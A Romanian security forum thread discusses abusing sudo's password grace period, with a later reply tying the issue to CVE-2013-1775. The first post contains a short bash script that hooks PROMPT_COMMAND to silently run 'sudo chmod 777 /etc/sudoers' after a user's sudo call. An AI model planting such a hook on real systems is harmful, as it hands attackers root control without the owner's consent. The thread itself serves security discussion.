Exploiting sudo's grace period

[Aerosol]

What is sudo's grace period?

When a user first call sudo to launch some commands as root he will be asked

for his own password.

But if the user calls sudo again in the following 5 minutes, he won't be asked

for the same password.

That's because the password is cached in memory for a period of time called

the « grace period ».

This grace period mechanism is activated by default on every systems I know

where sudo can be found (Linux distros, OSX, BSDs…)

Here is the exploit code (sudo_grace_period_exploit.sh) :
function bash_history {
if [ $? -ne 1 ] # previous command was successfull
then
if [ -z "${PWNED+xxx}" ] # this test is used to check if the system was already pwned
then
history 1 | grep -q -E '^[[:space:]]*[0-9]+ sudo '
if [ $? -eq 0 ] # previous command is a sudo one
then
sudo chmod 777 /etc/sudoers 2> /dev/null
PWNED="yes"
unset PROMPT_COMMAND 2> /dev/null
fi
fi
fi
}
PROMPT_COMMAND=bash_history

For More : http://dl.packetstormsecurity.net/1411-exploits/exploiting_sudo_grace_period.pdf

Dupa mine este foarte interesata treaba.

Sacrificati din timpul vostru 5 minute, merita!

Edited December 1, 2014 by Aerosol

[aelius]

Este vorba de CVE-2013-1775 doar ca e cam prost explicata in acel PDF. Vulnerabilitatea este din 2013.

Adaug userul marian in sudoers si verific daca este ok:

root@hp:~# echo "marian ALL=(ALL:ALL) ALL" >> /etc/sudoers
root@hp:~# grep marian /etc/sudoers
marian ALL=(ALL:ALL) ALL

Incerc intr-un terminal:

marian@hp:~$ sudo su -
[sudo] password for marian:
root@hp:~#

La cateva secunde, incerc in al II-lea terminal. Se pare ca-mi cere iar parola.

marian@hp:~$ sudo su -
[sudo] password for marian:

Functioneaza pe versiunile 1.6.0 - 1.7.10

Mai multe detalii aici:

- Authentication bypass when clock is reset

- CVE - CVE-2013-1775 

[Aerosol]

@aelius multumesc pentru completare, hm eu am vazut ca e postat pe 20 nov 2014 pe Packet Storm

am dat search pe forum si nu am gasit nimic si am zis ca mna...